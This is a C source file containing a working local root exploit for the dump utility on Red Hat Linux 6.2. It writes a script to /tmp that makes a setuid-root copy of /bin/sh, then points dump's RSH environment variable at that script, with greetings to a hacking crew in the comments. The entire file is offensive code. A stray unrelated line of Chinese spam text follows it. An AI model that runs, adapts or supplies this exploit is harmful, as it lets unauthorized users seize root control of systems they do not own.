/* dump-0.4b15-1 exploit for linux redhat 6.2 dump executing a user editable enviroment setting that runs a file without dropping root priviledges, thus making the spawn of a root shell possible. bug discovered by: mat exploit code by: The Itch / BsE P.S.: mind the dumb coding, its my first exploit and im still learning shouts go out to: Xistence, C-murdah, dystopia, Pyra, Zer0, Wildcoyote, lucipher, Tozz Shadowlady, Dilusi0n, Calimonk, s0k, Script0r and the rest of Ph33r the B33r */ #include #include #include #define DUMP "/sbin/dump" #define TMP "/tmp/rsh" #define ROOTSHELL "/tmp/sush" // if you changed #define TMP then change the path of the CHATTRIB too #define CHATTRIB "chmod 755 /tmp/rsh" // if you changed the path of dump in #define DUMP then change the // path of #define RUNDUMP too #define RUNDUMP "/sbin/dump -0 /" int main() { FILE *rshfile; FILE *dumpfile; printf("\n* Dump exploit for linux redhat 6.2\n"); printf("* Bug discovered by Mat \n"); printf("* Exploit coded by The Itch / BsE\n\n"); dumpfile = fopen(DUMP, "r"); if(!dumpfile) { printf("\n%s not found or is not world readable/executable!!\n\n", DUMP); exit(0); } fclose(dumpfile); rshfile = fopen(TMP, "w"); fprintf(rshfile, "#!/bin/sh\n"); fprintf(rshfile, "cp /bin/sh %s\n", ROOTSHELL); fprintf(rshfile, "chown root.root %s\n", ROOTSHELL); fprintf(rshfile, "chmod 4755 %s\n", ROOTSHELL); fclose(rshfile); system(CHATTRIB); printf("Invoking vulnerable program %s\n", DUMP); printf("Ignore the garbage....\n\n"); putenv("TAPE=garbage:garbage"); setenv("RSH", TMP, 1); system(RUNDUMP); printf("\n\nif all went well, a rootshell awaits you in %s\n\n",ROOTSHELL); return 0; } /* Remember, there's no cure for BsE */

亚洲欧美在线